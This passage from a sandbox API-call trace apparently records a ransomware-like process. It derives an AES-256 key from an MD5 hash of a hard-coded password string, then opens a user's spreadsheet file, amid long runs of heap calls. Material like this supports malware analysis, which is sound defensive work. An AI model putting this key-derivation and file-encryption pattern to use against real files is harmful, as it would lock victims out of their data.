0x43cb2e8 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0081.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0081.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0081.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0081.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0081.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0081.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0081.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0081.944] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0081.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797048, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0081.944] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0081.945] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4ae0) returned 1 [0081.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0081.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.947] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.948] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.948] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0081.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.948] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0081.948] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.949] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0081.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb468, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0081.949] CryptCreateHash (in: hProv=0x41a4ae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0081.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0081.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0081.949] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0081.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0081.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0081.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0081.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c35f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0081.950] CryptHashData (hHash=0x41ac180, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0081.950] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.950] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0081.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3848, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0081.950] CryptDeriveKey (in: hProv=0x41a4ae0, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac140) returned 1 [0081.950] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0081.950] CryptDestroyHash (hHash=0x41ac180) returned 1 [0081.951] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\lwek-jelbvy6ehj.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0081.951] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.951] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0081.951] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0081.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0081.952] 